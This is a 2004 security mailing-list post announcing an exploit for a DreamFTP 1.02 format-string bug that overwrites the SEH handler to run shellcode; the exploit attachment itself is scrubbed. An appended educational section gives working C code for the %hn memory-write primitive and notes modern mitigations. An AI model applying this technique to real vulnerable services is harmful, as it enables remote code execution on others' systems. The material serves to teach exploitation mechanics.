From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Subject: DreamFTP Server 1.02 Buffer Overflow

Hi all,

badpack3t wasn't totally wrong when he called it a BoF, because the
format string can cause BoFs. Anyway, it's a nice little format string to
exploit, with multiple possible attack vectors. I found it easiest to
overwrite the exception handler code (since it's RWE) and then cause an
exception.
The exploit sends about 375 bytes to the target, which causes DreamFTP to
print a string of about 4 million bytes to overwrite the SEH with the right
opcodes. It then causes an exception, which transfers control to the SEH,
which jumps to our shellcode.

The attached exploit has been tested on Win2k; other Windows platforms have
not been tested. If it doesn't work straight away, some minor adjustments
can probably fix that. (Let me know.)

Cheers,

SkyLined

----- Original Message ----- 
From: "badpack3t" <badpack3t@...urity-protocols.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Saturday, February 07, 2004 6:29
Subject: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow


<snip>
> Exploit:
>
> Not worth the time to debug and code an exploit.
>
<snip>

I find that hard to believe ;)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Nightmare.c
Type: application/octet-stream
Size: 4227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040211/f5be469f/Nightmare.obj
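The post above describes the mechanism only in one sentence: the 375-byte request makes DreamFTP "print" about 4 million characters, and that count is what a `%n` conversion stores into memory. The following is an added example written for this archive page, not SkyLined's Nightmare.c (the attachment is not reproduced here) and not DreamFTP code; the helper names `split_widths`, `plan_write32` and `fmt_write32` are hypothetical. It shows the `%hn` write primitive that such an exploit relies on: two 16-bit stores whose values are the running character count, driven purely by field widths. It assumes glibc on a little-endian machine (x86/x86-64). Because fortified glibc aborts when `%n` appears in a writable format string, the actual write is driven through a constant format with `%*x` widths passed as arguments, while the attacker-style wire string with the widths spelled out is built separately so you can see what would go over the network.

```c
/* Added example (not from the original post or DreamFTP): the %n write
 * primitive behind a format-string exploit. Helper names are hypothetical.
 * Assumes glibc and a little-endian target; the write itself uses a
 * constant format because fortified glibc refuses %n in writable formats. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Two 16-bit writes need running counts congruent to the low and the high
 * half of the value. A width of 0 still prints one character, so a needed
 * delta of 0 is produced by printing a full 65536 characters and letting
 * the 16-bit store wrap around. */
static void split_widths(uint32_t value, unsigned *w1, unsigned *w2)
{
    unsigned lo = value & 0xffffu;
    unsigned hi = value >> 16;
    *w1 = lo ? lo : 0x10000u;               /* count == lo (mod 2^16)  */
    unsigned d = (hi - lo) & 0xffffu;       /* unsigned wrap covers hi < lo */
    *w2 = d ? d : 0x10000u;                 /* count == hi (mod 2^16)  */
}

/* Build the string an attacker would actually send: "%<w1>x%hn%<w2>x%hn".
 * (In a real exploit the two target addresses sit in the same buffer so the
 * vulnerable printf finds them on the stack.) Returns the number of
 * characters the vulnerable printf will emit, i.e. the cost of one
 * 32-bit write. */
size_t plan_write32(uint32_t value, char *out, size_t outlen)
{
    unsigned w1, w2;
    split_widths(value, &w1, &w2);
    snprintf(out, outlen, "%%%ux%%hn%%%ux%%hn", w1, w2);
    return (size_t)w1 + w2;
}

/* Perform the write on *target. After the first "%*x" the running count
 * equals the low half and %hn stores it; the second "%*x" raises the count
 * to the high half (mod 2^16) and the second %hn stores that one word up.
 * Here the two short* are passed explicitly instead of being fished off the
 * stack. Returns the number of characters printed (0 on allocation failure). */
size_t fmt_write32(uint32_t *target, uint32_t value)
{
    unsigned w1, w2;
    split_widths(value, &w1, &w2);
    short *lo_p = (short *)target;          /* little-endian: low half first */
    short *hi_p = lo_p + 1;
    size_t need = (size_t)w1 + w2 + 1;
    char *sink = malloc(need);              /* stands in for the server's output */
    if (!sink)
        return 0;
    int n = snprintf(sink, need, "%*x%hn%*x%hn",
                     (int)w1, 0u, lo_p, (int)w2, 0u, hi_p);
    free(sink);
    return n < 0 ? 0 : (size_t)n;
}

int main(void)
{
    char wire[64];
    uint32_t cell = 0;                      /* the memory word being overwritten */
    size_t cost = plan_write32(0xDEADBEEFu, wire, sizeof wire);
    printf("wire string: %s  (server prints %zu characters)\n", wire, cost);
    fmt_write32(&cell, 0xDEADBEEFu);
    printf("cell after write: 0x%08" PRIX32 "\n", cell);
    return 0;
}
```

Two practical notes. A single `%n` store of a full 32-bit value needs a count equal to that value, which is why a format-string write can cost millions of characters of output; splitting it into `%hn` halves, as above, caps one 32-bit write at about 131k characters but needs two addresses in the buffer. And the primitive is not universally available any more: fortified glibc aborts on `%n` in a writable format string, and MSVC's CRT has `%n` disabled unless the program enables it with `_set_printf_count_output`, so a 2004-era Win2k target and a modern one are in different positions.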
